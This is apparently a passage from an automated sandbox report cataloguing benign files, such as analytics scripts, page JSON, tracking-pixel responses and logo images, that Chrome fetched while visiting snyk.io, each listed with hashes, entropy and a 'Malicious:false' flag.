                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                                                                              MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                                                                              SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                                                                              SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                                                                              SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://td.doubleclick.net/td/ga/rul?tid=G-X9SH3KP7B4&gacid=1178466141.1729799377&gtm=45je4al0v879460793za200zb9131853231&dma=0&gcs=G111&gcd=13r3r3r3r5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101533421~101686685~101794737~101823848&z=1699791070
                                                                                                                                                                                                                                                                                                              Preview:<html></html>
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):206232
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.433565204722256
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:dIwaPlC0pCax+sEhXla74a7naqBtYezU6IKeyo8rC8UglCJ9P1xb:dI1IlaEajaq/lo8rC
                                                                                                                                                                                                                                                                                                              MD5:7F16B636D5C74B50AE2EADA438D25A23
                                                                                                                                                                                                                                                                                                              SHA1:9273A01CC18A1AFBD5763A10B668669A1B62C653
                                                                                                                                                                                                                                                                                                              SHA-256:0E16B9F7CE650C3ED0045C50306B1569E9A69FC76215161634E1B446DE8E8523
                                                                                                                                                                                                                                                                                                              SHA-512:F02BD34D0C8F0014333C97C59B686CEB63A56212D1E44BE1A4C7ACA5C0D004A623AACF9259BC04023CA7FD956053EB77BB49A66652783BE694E8580A89E1C304
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/pages/_app-0cbf3048c9ba7463.js
                                                                                                                                                                                                                                                                                                              Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{51075:function(e,t,a){"use strict";var r=a(74331),n=Object.prototype.toString,o=function(e){var t=typeof e;return"number"===t||"object"===t&&"[object Number]"===n.call(e)},s="function"==typeof Array.isArray?Array.isArray:function(e){return"[object Array]"===n.call(e)},i=function(e,t){for(var a=0;a<t.length&&!1!==e(t[a],a,t);a+=1);},l=function(e,t){for(var a=r(t),n=0;n<a.length&&!1!==e(t[a[n]],a[n],t);n+=1);};e.exports=function(e,t){return(null!=t&&(s(t)||"function"!==t&&o(t.length))?i:l).call(this,e,t)}},74331:function(e){"use strict";var t=Object.prototype.hasOwnProperty,a=String.prototype.charAt,r=Object.prototype.toString,n=function(e,t){return a.call(e,t)},o=function(e,a){return t.call(e,a)},s=function(e,t){t=t||o;for(var a=[],r=0,n=e.length;r<n;r+=1)t(e,r)&&a.push(String(r));return a},i=function(e,t){t=t||o;var a=[];for(var r in e)t(e,r)&&a.push(String(r));return a};e.exports=function(e){return null==e?[]:"[object Str
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65533), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):115952
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.08585199829037
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:TF2kDFEFRQvb1x89Ow3PDJJYJ1yiuDXkZ9XcpMQIHljDeqQeZ4lA5uhJ07vgYCCG:UHt6SLN
                                                                                                                                                                                                                                                                                                              MD5:F4DCDD755FA583B0D99067BE1A392094
                                                                                                                                                                                                                                                                                                              SHA1:3E5DB2395FBA8372966C06259F410935F5F8E3D2
                                                                                                                                                                                                                                                                                                              SHA-256:28B1F1536EC23D0EC464DAB4D4C3B4BCB30EB5FE924FD85C6E4D79ECACDB4F20
                                                                                                                                                                                                                                                                                                              SHA-512:5681B7C3E3BBFDFBB5DF7D5B5ED5F4BF36BA32E8CD522D1142643DECF379344A824DE84654E14E77BDA6154B56CB99C22AD9CB206FDED864CCB5E5C614C663FC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/plans.json?slug=plans
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3b01oc5xKdJHrnwd3O3bMn","type":"Entry","createdAt":"2023-12-07T11:13:41.196Z","updatedAt":"2024-05-01T11:45:05.332Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":39,"revision":10,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"\"Pricing\" - Updated","title":"Plans","slug":"plans-updated","uri":"plans","pageLocalization":["ja","fr","pt-BR","de"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6U9SYGWPVg5MK8lNrhS1Dg","type":"Entry","createdAt":"2023-07-31T16:00:39.968Z","updatedAt":"2024-07-16T03:25:41.743Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":67,"revision":24,"conte
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                              MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                                                                                                                                                              SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                                                                                                                                                              SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                                                                                                                                                              SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://px.ads.linkedin.com/attribution_trigger?pid=970508&time=1729799395915&url=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F
                                                                                                                                                                                                                                                                                                              Preview:{}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 17 x 17, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):386
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.726320581783242
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:6v/lhP6Dlfy6fy2ieBYI4bl0OIFfJIzYxUurBOvgJA3NXV+nI5tsup:6v/7KHqPyYBl0OMdlkvgOmnWN
                                                                                                                                                                                                                                                                                                              MD5:7DA2AE17C3B671047838F7B78687A56F
                                                                                                                                                                                                                                                                                                              SHA1:ADE29E47143CF20C4A2FB6B182D284A439C43BE6
                                                                                                                                                                                                                                                                                                              SHA-256:C3A58E45CCFFFECE1DF8E470FD853A81321E4F78F6AF8D22E78310DA1380F7D5
                                                                                                                                                                                                                                                                                                              SHA-512:0C860BB872A4A14D2F6B6B13D8594A6C0B4F5D120925B4E1868F58BEE8DB009F0969D7577CB3D3913F22CA658EAAA805991A4B1C55C3792D532DDA2E68D1B34F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................rPLTE..................................................................................................................U..`...%tRNS.....E..4...cV@......wP/(......{n<VA.F....IDAT..m.Y..0.C......uou.+bg2|..[...Dg...]Ww..}..`<.....C.O.......d.....~n/b.Y%.'.r.,.(..!..........*..z..*M.@c...-......e.........^B.7..b..E.f-..cNf:..{...-.......IEND.B`.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1490)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):1559
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.120755987626891
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:iKQKFYYCvoDlgVDyNQ2glkMBaqNTYEZqNF5XmbxDy:jJmYoyGPlkMBa+TrZqp2y
                                                                                                                                                                                                                                                                                                              MD5:3867B2388B619FF7FDDC29EF359FC9AA
                                                                                                                                                                                                                                                                                                              SHA1:511BED0C4D3D57AB4CF1B1D7596FB845ECFBA6AC
                                                                                                                                                                                                                                                                                                              SHA-256:31892C21AE4FB908A875BBE29DBF0DF74C2E84171CFBCAC23540F3AD8222A35A
                                                                                                                                                                                                                                                                                                              SHA-512:7BFD6E6CD2FE7A79F4797439BC7294A36D076D67A3DC5BB8E86FA5AF19B50F0E8FEC18BF33B30588486B231062E43F417708333044207A586AAD999E97E819A5
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://cdn.segment.com/analytics-next/bundles/schemaFilter.bundle.5c2661f67b4b71a6d9bd.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_segment_analytics_next=self.webpackChunk_segment_analytics_next||[]).push([[493],{9254:function(n,e,t){function i(n,e){var t,i;return"boolean"==typeof(null==e?void 0:e.enabled)?e.enabled:null===(i=null===(t=null==n?void 0:n.__default)||void 0===t?void 0:t.enabled)||void 0===i||i}t.d(e,{n:function(){return i}})},5081:function(n,e,t){t.r(e),t.d(e,{schemaFilter:function(){return o}});var i=t(5163),r=t(9254);function o(n,e){function t(t){var o=n,u=t.event.event;if(o&&u){var a=o[u];if(!(0,r.n)(o,a))return t.updateEvent("integrations",(0,i.pi)((0,i.pi)({},t.event.integrations),{All:!1,"Segment.io":!0})),t;var s=function(n,e){var t,i;if(!n||!Object.keys(n))return{};var r=n.integrations?Object.keys(n.integrations).filter((function(e){return!1===n.integrations[e]})):[],o=[];return(null!==(t=e.remotePlugins)&&void 0!==t?t:[]).forEach((function(n){r.forEach((function(e){n.creationName==e&&o.push(n.name)}))})),(null!==(i=e.remotePlugins)&&void 0!==i?i:[]).reduce((fu
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):4258
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.980462729700634
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:0BIajxCmpAKjkZWPpyEqZlHDV/yt6kBqC:KCmpAOMLDNq6U
                                                                                                                                                                                                                                                                                                              MD5:21AD214C0BDBD67E1C6AA29D8869B520
                                                                                                                                                                                                                                                                                                              SHA1:79930A4AE379FAB65E27E71041DECB66C20EAB55
                                                                                                                                                                                                                                                                                                              SHA-256:E845D5373FDA432CE99860FC2FD6FB48EE94A0EC4C37120391299109498797C5
                                                                                                                                                                                                                                                                                                              SHA-512:4C2F080FD9082774B61048436E10596DAF9D67B40623643F18E61288A7EA97CAC024C5621E67FF0C314CF08225AF8D809A587FBAE7FC365159E49A09E8DFBA66
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://cdn.segment.com/v1/projects/UspolAZH46ZIH3mN3bdf7rx63q24gitb/settings
                                                                                                                                                                                                                                                                                                              Preview:{"integrations":{"Google Analytics":{"anonymizeIp":false,"classic":false,"contentGroupings":{},"dimensions":{"Author":"dimension4","Post Categories":"dimension5","Content Tags":"dimension6"},"domain":"","doubleClick":true,"enableServerIdentify":true,"enhancedEcommerce":false,"enhancedLinkAttribution":false,"identifyCategory":"","identifyEventName":"","ignoredReferrers":[],"includeSearch":true,"metrics":{},"mobileTrackingId":"UA-69111857-1","nameTracker":false,"nonInteraction":true,"optimize":"GTM-K59728M","preferAnonymousId":false,"protocolMappings":{},"reportUncaughtExceptions":false,"resetCustomDimensionsOnPage":[],"sampleRate":100,"sendUserId":true,"setAllMappedProps":true,"siteSpeedSampleRate":1,"topLevelContextMapping":false,"trackCategorizedPages":true,"trackNamedPages":true,"trackingId":"UA-69111857-1","useGoogleAmpClientId":false,"versionSettings":{"version":"2.18.5","componentTypes":["browser","ios","android","server"]},"type":"browser","bundlingStatus":"bundled"},"AdWords":{"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):13200
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9372000207729942
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:ME0UoujD4UGB86a2GtLQhLdsoZLTknzTsSSQNtxms2cYaVhUWLc8UPUfM83S4sRl:broujDQdYtkhLdsOkXm6xFRKY7c3V
                                                                                                                                                                                                                                                                                                              MD5:B00E8EA16E20F20C7C197906CE85AC76
                                                                                                                                                                                                                                                                                                              SHA1:7007A319FF0BB730C1823EEE3752EC936BAFFE0B
                                                                                                                                                                                                                                                                                                              SHA-256:7463540BA060153DF141F55FDE92E43B509388A87ABB75209182844FEF2F09E9
                                                                                                                                                                                                                                                                                                              SHA-512:98FE86FEBD631A0F1D9A98F636B8C0DCED0097456F8F9016534A03AA1DE540789AD0B220C766944FE482B698BADF2C5679E7AAB86D6D5688C371F8F62AE2F818
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/snyk-mktg-brandui/brand-logos/default-solid-light.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg viewBox="0 0 101 52" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_9532_31065)">.<g clip-path="url(#clip1_9532_31065)">.<path d="M32.03 11.6196C31.6033 11.5001 31.1568 11.3806 30.6905 11.2667C30.8377 11.8243 30.9193 12.3974 30.9336 12.9742V13.384L28.9837 18.6716C29.9728 27.8267 29.4895 29.076 29.3313 29.4858C29.0798 30.1375 28.4072 31.1933 27.2797 32.7301L28.3874 43.0377L32.4172 40.1292C32.5816 40.0107 32.7156 39.8543 32.808 39.6732C32.9003 39.492 32.9485 39.2913 32.9485 39.0877V12.849C32.9474 12.5718 32.8574 12.3023 32.6919 12.0808C32.5264 11.8593 32.2942 11.6975 32.03 11.6196Z" fill="#030328"/>.<path d="M32.9485 39.0905C32.9485 39.2941 32.9003 39.4949 32.808 39.676C32.7156 39.8572 32.5816 40.0135 32.4172 40.1321L28.3874 43.0405L27.2797 32.7329C28.41 31.2018 29.0798 30.1403 29.3313 29.4886C29.4895 29.0788 29.9728 27.8295 28.9837 18.6744L30.9336 13.3868V12.977C30.9193 12.4002 30.8377 11.8271 30.6905 11.2695C31.1568 11.3834 31.6033 11.5029 32.03 11.6224C3
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (9500), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):9500
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.361838920270885
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:j85B3yJdCE9r1dPZiDVGTtxRNs9lWzCWDFELiIh77fL4KL4vTfNhB:jawdC2BdPeOUDWzCOFELiIh77UzbVhB
                                                                                                                                                                                                                                                                                                              MD5:B2877DA906A3216C4F3FC4030B205E54
                                                                                                                                                                                                                                                                                                              SHA1:F7A612259BB345C70A1CAC073527E39DD5D8A0B7
                                                                                                                                                                                                                                                                                                              SHA-256:E779904E434D50E426E79DFAC680CDB8A04564E67121C257974278A02979E407
                                                                                                                                                                                                                                                                                                              SHA-512:428880BD5D5F63AF2E6A9354A6A500249E2A9EC96E5D3B995AEB9A467DBC075B255ACFFDB48A1A265273CFDFD25EBAB308D3B765BCCAD1C8BFF508947C19B866
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://js.zi-scripts.com/zi-tag.js
                                                                                                                                                                                                                                                                                                              Preview:if(!window.zitag){window.zitag={}}window.ZILogs={ziScript:{info:"",err:"",scriptsLoaded:[]},chat:{},ws:{},sch:{},fc:{}};window.zitag.SCHEDULE_BACKEND_URL=window.ZITagEnv==="dev"?"https://schedule-staging.zoominfo.com/zischedule.js":"https://schedule.zoominfo.com/zischedule.js";window.zitag.FORMCOMPLETE_BACKEND_URL=window.ZITagEnv==="dev"?"https://ws-assets-staging.zoominfo.com/formcomplete.js":"https://ws-assets.zoominfo.com/formcomplete.js";window.zitag.ZI_TAG_BACKEND_URL=window.ZITagEnv==="dev"?"https://js-staging.zi-scripts.com/unified/v1/master/":"https://js.zi-scripts.com/unified/v1/master/";window.zitag.ZI_WS_BACKEND_URL=window.ZITagEnv==="dev"?"https://wss.zoominfo.com/pixel/":"https://ws.zoominfo.com/pixel/";window.zitag.isScheduleScriptAlreadyLoaded=()=>{if(window.zischedule)return true;else return false};window.zitag.isChatScriptAlreadyLoaded=()=>{if(window.insentCompanyDomain&&window.insentProjectName&&window.insentProjectKey)return true;else return false};window.zitag.isFor
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (59195), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):59224
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1578474908107355
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:OLR1G60CchfglZYdHYloGcZoEMVvpxl+fm9re9PE8waMe:o07CchwkHNSXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:56F751A14AB4CC65718AE0D2294F2F12
                                                                                                                                                                                                                                                                                                              SHA1:5FD59323418398AAC8EA0E14D04B821B97380597
                                                                                                                                                                                                                                                                                                              SHA-256:098545A8CF3BDFC69186D80F3D5502A9A77A2EFD2C227F513791D2A04B54903F
                                                                                                                                                                                                                                                                                                              SHA-512:06E9D8399D4D69DABEB07D5B92A95571E41FA56D984CEB0458164FD81DECDFFD10FCB752DBFD5D0BEE341159E22C52F5C225551012CB66ABC95AFD6357E84FFC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform/deepcode-ai.json?slug=platform&slug=deepcode-ai
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5SuIVtw89WA8kEnZn4iQW8","type":"Entry","createdAt":"2023-06-07T13:17:37.143Z","updatedAt":"2024-10-08T15:49:04.200Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":47,"revision":6,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"AI Platform page","title":"DeepCode AI | AI Code Review | AI Security for SAST | Snyk AI","slug":"snyk-powered-by-deepcode-ai","uri":"platform/deepcode-ai","pageLocalization":["ja","de","fr","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4AjR4bFcNfaVsKRadzmHgW","type":"Entry","createdAt":"2023-06-07T13:17:37.239Z","updatedAt":"2024-10-08T15:49:04.717Z","environment":{"sys":{"id":"master","typ
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:C source, ASCII text, with very long lines (18167)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):18168
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.58300957861083
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:YrFzeHc9iUGxrWa5GE2FDXPn1toA8AwpM4ndj69:Oze892aamz1CAgHdg
                                                                                                                                                                                                                                                                                                              MD5:3F44B799C727CBAC65D90F0779B8EB4E
                                                                                                                                                                                                                                                                                                              SHA1:77376CA0C1045402E9B434FB4BE8E6424BF6C7D2
                                                                                                                                                                                                                                                                                                              SHA-256:1220BDF087A7B3B0F068E1DC2422C361EF11CF999FF8EA343573D9E5A7C19BDC
                                                                                                                                                                                                                                                                                                              SHA-512:372AB2DBC89967B38ACA8B4B9AFCB0A5852C038D7632EBDF8E0E2F4074071E5243CADD1F36B3011267D565157FE2413B259246B8847DFEF461A93C1C74603BC4
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:!function(e,t,n,r){"use strict";n&&"undefined"!=typeof window&&"function"==typeof define&&define.amd?define(r):n&&"undefined"!=typeof module&&module.exports?module.exports=r():n&&t.exports?t.exports=r():t[e]=r()}("undefined"!=typeof window&&window.IdentityConfig?window.IdentityConfig.name:"Identity","undefined"!=typeof window&&window.IdentityConfig?window.IdentityConfig.context:this,"undefined"==typeof window||!window.IdentityConfig||window.IdentityConfig.enableModule,(function(){"use strict";void 0===Array.isArray&&(Array.isArray=function(e){return"[object Array]"===Object.prototype.toString.call(e)});var e=function(e,t){e=[e[0]>>>16,65535&e[0],e[1]>>>16,65535&e[1]],t=[t[0]>>>16,65535&t[0],t[1]>>>16,65535&t[1]];var n=[0,0,0,0];return n[3]+=e[3]+t[3],n[2]+=n[3]>>>16,n[3]&=65535,n[2]+=e[2]+t[2],n[1]+=n[2]>>>16,n[2]&=65535,n[1]+=e[1]+t[1],n[0]+=n[1]>>>16,n[1]&=65535,n[0]+=e[0]+t[0],n[0]&=65535,[n[0]<<16|n[1],n[2]<<16|n[3]]},t=function(e,t){e=[e[0]>>>16,65535&e[0],e[1]>>>16,65535&e[1]],t=
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):52916
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.51283890397623
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                                                                                                                              MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                                                                                                                              SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                                                                                                                              SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                                                                                                                              SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, max compression, from Unix, original size modulo 2^32 71723
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):21911
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.990284604228861
                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                              SSDEEP:384:eGzePcKhqp8ppchvs0oqCDAJXULtUlxWlkl5HKQ5Ds+XLowwEYDVcDBC0EFYvncy:eGzekKop0cvs2CDWOulHvHKQ5AYOVlDA
                                                                                                                                                                                                                                                                                                              MD5:C467A63B2E7C3A99BE423ACE649014D8
                                                                                                                                                                                                                                                                                                              SHA1:91A3CB3EBF4F3996512A740FC202E1803828594F
                                                                                                                                                                                                                                                                                                              SHA-256:D070E8B363B2CB1BC55B94F1612A1AF673155DF31773E992007F8952E3661EE5
                                                                                                                                                                                                                                                                                                              SHA-512:956B41FC42B9C3C4E161AF37270D3EAEA9E5936B4A99685727235BF9A46BF05ACAE5A64A4EB9A305EBF1ED5F752DF8FB9912626765DEBF1EB82839DF2124CA92
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://cdn.segment.com/next-integrations/integrations/vendor/commons.a61d7bea37d2de5d4b69.js.gz
                                                                                                                                                                                                                                                                                                              Preview:...........i{.8.0...........dFo.N'=.N..>.E.%.b".j...X..~....E.2..<.L."A.P...B-.......5.Xx....a...xs..E....K.0pw.Z..N}....`...[...e..N.......,rn.e.+q.........^yQ..I=......vz.O.QPi....3.\&..j...I..[.Q..i..,../y.....l.W.E.S....d..^.A2..V..S/....f..p....@.e.K>..0...u.&.d....X.i.x.f?...q.z<.G.n.C(..Z..U...lo:.e=....b...s....'..I.Qx]..u...~..0.-.X...Q......q8Z.y.8=...m.....a.i@.|.].j."Gv8..".]w.%..1....f..3.....1....O.KfY.n.F....Y....r.@......3....4..,..?.x....K7a>.0.....?..~}...=;k..g.....4....$..O...u.6..<Jn.#o6.C.8.p...a..O..,a#............0..WY.....&....~..].5l._...|w..C..K...[h,..z.y...#*6...E.[,x0V.6B.n.....w....t...$.J.j.#=g.........6..%..?<k._.2.......;kx...`.L*X.k..|..".f5..G."\M.....w....m!l..E.U.+M.m.{;....A.Yg....1O.Z..H.,...6$J....".xT8C.Q8+.3...(\.Di.f.P.......>.....a..4a....u/.'c..L.A.Pe.I...%x..pA...............P..3.i.dAG.8.].H..#..:.....'.0L\.aY;a."..g70L..r ....0...h4.............a.D...m>.b..D..6...Yu.at.h7....*W<
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
